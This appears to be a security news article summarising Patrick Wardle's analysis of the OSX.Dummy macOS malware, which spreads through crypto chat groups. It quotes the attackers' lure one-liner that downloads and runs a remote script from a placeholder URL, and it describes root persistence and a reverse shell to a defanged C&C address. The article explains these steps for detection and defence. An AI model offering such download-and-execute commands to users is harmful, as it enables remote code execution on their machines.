“Previous days we’ve seen multiple MacOS malware attacks, originating within crypto related Slack or Discord chats groups by impersonating admins or key people. Small snippets are being shared, resulting in downloading and executing a malicious binary.” wrote Verhoef.

The Wardle intent was to demonstrate that the Objective-See’s tools can generically thwart this new threat even if it was undetected by all the anti-virus software.

Verhoef noticed that the attack was originating within crypto related Slack or Discord chats groups by impersonating admins or key people.

The attackers shared small code snippets like the following one resulting in downloading and executing a malicious binary.

$ cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script

Wardle noticed that the malicious binary is not signed, this means it would be blocked by GateKeeper, but attackers overwhelmed this limitation by making the victims to download and run the binary directly via terminal commands.

Wardle conducted a dynamic analysis of the malware using a High Sierra virtual machine with various Objective-See tools installed.

The malware first sets script to be owned as root

# procInfo
 
monitoring for process events...
 
process start:
pid: 432
path: /usr/bin/sudo
args: (
   "/usr/bin/sudo",
   "-S",
   "-p",
   "#node-sudo-passwd#",
   chown,
   root,
   "/tmp/script.sh"
)

then it changes file’s permissions to root by executing the sudo command, but this will require the user to enter the password in the terminal.

The malware sets up the RunAtLoad key to true, this implies that the value of the Program key, /var/root/script.sh, will be automatically executed by the OS whenever the system is rebooted.

“It then duplicates stdin, stdout and stderr to the socket, before executing /bin/sh with the –i flag. In other words, it’s setting up an interactive reverse shell.” explained Wardle.

“If you have a firewall product installed, such as Objective-See’s LuLu, this network activity will be detected”

If the malware successfully connects the C&C server (185[.]243.115.230:1337), the attacker will be able to arbitrarily execute commands as root on the target system.

Below the key findings of Wardle analysis on the OSX.Dummy:

• the infection method is dumb
• the massive size of the binary is dumb
• the persistence mechanism is lame (and thus also dumb)
• the capabilities are rather limited (and thus rather dumb)
• it’s trivial to detect at every step (that dumb)
• …and finally, the malware saves the user’s password to dumpdummy

“To check if you’re infected run KnockKnock as root (since the malware set’s it components to be readable only by root). Look for an unsigned launch item com.startup.plist executing something named ‘script.sh'” Wardle concluded.

Pierluigi Paganini

(Security Affairs – malware, OSX.Dummy)

[adrotate banner=”5″]

[adrotate banner=”13″]